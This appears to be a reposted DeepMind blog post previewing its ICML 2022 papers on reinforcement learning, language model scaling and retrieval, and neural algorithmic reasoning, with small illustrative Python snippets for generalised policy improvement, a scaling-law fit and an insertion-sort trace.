DeepMind’s latest research at ICML 2022 – Today’s AI News
December 22, 2024

Paving the way for generalised systems with more effective and efficient AI

Starting this weekend, the thirty-ninth International Conference on Machine Learning (ICML 2022) is taking place from 17-23 July 2022 at the Baltimore Convention Center in Maryland, USA, running as a hybrid event.

Researchers working across artificial intelligence, data science, machine vision, computational biology, speech recognition, and more are presenting and publishing their cutting-edge work in machine learning.

In addition to sponsoring the conference and supporting workshops and socials run by our long-term partners LatinX, Black in AI, Queer in AI, and Women in Machine Learning, our research teams are presenting 30 papers, including 17 external collaborations. Here’s a brief introduction to our upcoming oral and spotlight presentations:

Effective reinforcement learning

Making reinforcement learning (RL) algorithms more effective is key to building generalised AI systems. This includes increasing the accuracy and speed of agents’ performance, improving transfer and zero-shot learning, and reducing computational costs.

In one of our selected oral presentations, we show a new way to apply generalised policy improvement (GPI) over compositions of policies, making it even more effective at boosting an agent’s performance. Another oral presentation proposes a new grounded and scalable way to explore efficiently without the need for bonuses. In parallel, we propose a method for augmenting an RL agent with a memory-based retrieval process, reducing the agent’s dependence on its model capacity and enabling fast and flexible use of past experiences.
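
To make the GPI idea concrete, here is a minimal sketch of the principle in Python (our own illustration under simplified assumptions, not the paper’s implementation): given Q-value estimates for a set of known policies, the GPI policy acts greedily with respect to their pointwise maximum, and is guaranteed to perform at least as well as every policy it combines.

    import numpy as np

    def gpi_action(q_values: np.ndarray) -> int:
        # q_values has shape (num_policies, num_actions) for a single state.
        best_per_action = q_values.max(axis=0)  # upper envelope over policies
        return int(best_per_action.argmax())    # act greedily on that envelope

    # Illustrative numbers: three policies' Q-estimates over four actions.
    q = np.array([[1.0, 0.2, 0.5, 0.1],
                  [0.3, 0.9, 0.4, 0.2],
                  [0.2, 0.1, 1.2, 0.0]])
    print(gpi_action(q))  # -> 2, where the third policy's estimate dominates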

Progress in language models 

Language is a fundamental part of being human. It gives people the ability to communicate thoughts and concepts, create memories, and build mutual understanding. Studying aspects of language is key to understanding how intelligence works, both in AI systems and in humans.

Our oral presentation on unified scaling laws and our paper on retrieval both explore how we might build larger language models more efficiently. Looking at ways of building more effective language models, we introduce StreamingQA, a new dataset and benchmark for evaluating how models adapt to and forget new knowledge over time, while our paper on narrative generation shows how current pretrained language models still struggle to create longer texts because of short-term memory limitations.
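
As a rough illustration of what such a scaling law looks like (a toy sketch with synthetic numbers, not the analysis from our paper): loss is modelled as a power law in parameter count, L(N) = a * N**(-alpha), which becomes a straight line in log-log space, so the exponent can be recovered with a simple linear fit.

    import numpy as np

    # Synthetic (made-up) parameter counts and validation losses.
    n_params = np.array([1e7, 1e8, 1e9, 1e10])
    losses = np.array([4.2, 3.5, 2.9, 2.4])

    # log L = log a - alpha * log N, so a degree-1 fit in log-log space
    # recovers the power-law exponent as the negated slope.
    slope, intercept = np.polyfit(np.log(n_params), np.log(losses), 1)
    alpha = -slope
    print(f"fitted exponent alpha = {alpha:.3f}")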

Algorithmic reasoning

Neural algorithmic reasoning is the art of building neural networks that can perform algorithmic computations. This growing area of research holds great potential for helping adapt known algorithms to real-world problems.

We introduce the CLRS benchmark for algorithmic reasoning, which evaluates neural networks on performing a diverse set of thirty classical algorithms from the Introduction to Algorithms textbook. We also propose a general incremental learning algorithm that adapts hindsight experience replay to automated theorem proving, an important tool for helping mathematicians prove complex theorems. In addition, we present a framework for constraint-based learned simulation, showing how traditional simulation and numerical methods can be used in machine learning simulators – a significant new direction for solving complex simulation problems in science and engineering.
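
To give a flavour of the trace-style supervision such benchmarks rely on, here is a hypothetical sketch in the spirit of CLRS (it mimics the idea, not the benchmark’s actual data format): an algorithm is executed step by step, and each intermediate state becomes a "hint" that a network can be trained to predict.

    def insertion_sort_with_trace(xs):
        # Run insertion sort while recording every intermediate state.
        xs = list(xs)
        trace = [tuple(xs)]             # initial state
        for i in range(1, len(xs)):
            j = i
            while j > 0 and xs[j - 1] > xs[j]:
                xs[j - 1], xs[j] = xs[j], xs[j - 1]
                j -= 1
            trace.append(tuple(xs))     # state after inserting element i
        return xs, trace

    sorted_xs, hints = insertion_sort_with_trace([3, 1, 2])
    # hints == [(3, 1, 2), (1, 3, 2), (1, 2, 3)]: per-step targets that an
    # algorithmic reasoner could be trained to predict alongside the output.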

See the full range of our work at ICML 2022 here.
